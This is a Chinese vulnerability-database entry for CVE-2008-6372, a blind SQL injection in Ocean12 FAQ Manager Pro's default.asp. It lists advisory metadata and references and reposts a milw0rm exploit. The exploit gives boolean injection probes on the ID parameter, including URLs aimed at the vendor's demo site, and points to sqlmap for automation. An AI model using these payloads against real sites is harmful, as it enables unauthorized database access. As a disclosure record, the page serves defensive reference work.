Ocean12Tech Ocean12 FAQ Manager Pro 'default.asp' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116847 漏洞类型 SQL注入
发布时间 2008-11-28 更新时间 2009-03-03
CVE编号 CVE-2008-6372 CNNVD-ID CNNVD-200903-026
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7271
https://cxsecurity.com/issue/WLB-2009030125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-026
|漏洞详情
Ocean12ContactManagerPro是一款在线地址簿应用程序。Ocean12FAQManagerPro1.0版本的default.asp中存在SQL注入漏洞。远程攻击者可以借助一个Cat操作中的id参数,执行任意SQL指令。
|漏洞EXP
#########################################################
---------------------------------------------------------
Portal Name: Ocean12 FAQ Manager Pro
Author : Mountassif Moad
 Evil Finger / v4 Team
Vulnerability : Blind Sql Injection
---------------------------------------------------------
#########################################################
Exploit :
site.com/?Action=Cat&ID=40%20and%201=1 true
site.com/?Action=Cat&ID=40%20and%201=0 false
Demo :
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=1 true
http://ocean12tech.com/products/faq/demo/?Action=Cat&ID=40%20and%201=0 false

# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...

# milw0rm.com [2008-11-28]
|参考资料

来源:XF
名称:faqmanager-default-sql-injection(46945)
链接:http://xforce.iss.net/xforce/xfdb/46945
来源:BID
名称:32524
链接:http://www.securityfocus.com/bid/32524
来源:MILW0RM
名称:7271
链接:http://www.milw0rm.com/exploits/7271
来源:SECUNIA
名称:32930
链接:http://secunia.com/advisories/32930